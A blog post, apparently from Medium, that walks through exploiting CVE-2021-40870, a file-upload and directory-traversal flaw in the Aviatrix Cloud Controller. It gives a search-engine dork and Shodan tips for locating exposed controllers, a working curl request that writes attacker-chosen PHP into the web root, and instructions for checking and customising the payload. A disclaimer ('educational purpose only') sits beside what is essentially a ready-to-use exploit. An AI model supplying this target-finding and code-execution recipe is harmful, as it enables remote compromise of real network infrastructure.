Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code [CVE-2021–40870]

Similar APIs designed to upload files from authenticated users did not properly sanitize their destination input, allowing directory traversal attacks which could eventually allow an authenticated attacker to execute code on the controller.

So Directory traversal Actually allowing an unauthenticated attacker to execute code or store code on controller.

So before exploiting this vulnerability we need to find it , We can do that using google or shodan lets start with google.

intitle:"Aviatrix Cloud Controller"

Shodan contains more result than google, other search engine like shodan will be helpful.Finding this vulnerability and exploiting it in the wild is not a good idea cause if those target doesn’t support , testing by outsider that means its not legal. [Educational purpose only]


We can exploit this vulnerability using curl or python3 . Lets start with curl,

curl -k https://domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'

It will return success , that doesn’t mean you have successfully exploited the vulnerability , check if file is really saved or not with this path https://domain.tld/v1/test.

We used the test at the last because in account_name parameter we give the php file test.php name you can changed that , after changing that the file name will also be changed on exploit path and in data parameter we gave our php code that will be save in the file. exploiting this vulnerability is kinda easy for attacker and its quite harmful cause an attacker can store php code on your control.

You also can use the python3 exploit i wrote:

on -u give target url , on -c give your php code , on -n give file name

[Do not use information on this article for any illegal activity , if you use i am not responsible for this]




Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} KooZac™ Hack Free Resources Generator

Apple & Data Privacy — Wallet Update

{UPDATE} Suntop Games Hack Free Resources Generator

Hacking the Tenda AC10–1200 Router Part 3: Yet Another Buffer Overflow

I use LunarCrush to track social insights for cryptocurrencies. Check it out!

XT.COM Will List DBEA(Deep Blue Sea Token) and Open Its Trading

The complexity of privacy decisions

Let’s Mint the NFA: A Complete Walkthrough of How to Get Your Arken’s Non-Fungible Airdrop (NFA)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

More from Medium

The exploitation of a vulnerability named Log4Shell (CVE-2021–44228)

DNS Amplification Attacks Explained 💪

Log4j 2.17.0 RCE Vulnerability — CVE-2021–44832

Bypassing IP Based Blocking with IP Rotate Burp Extension.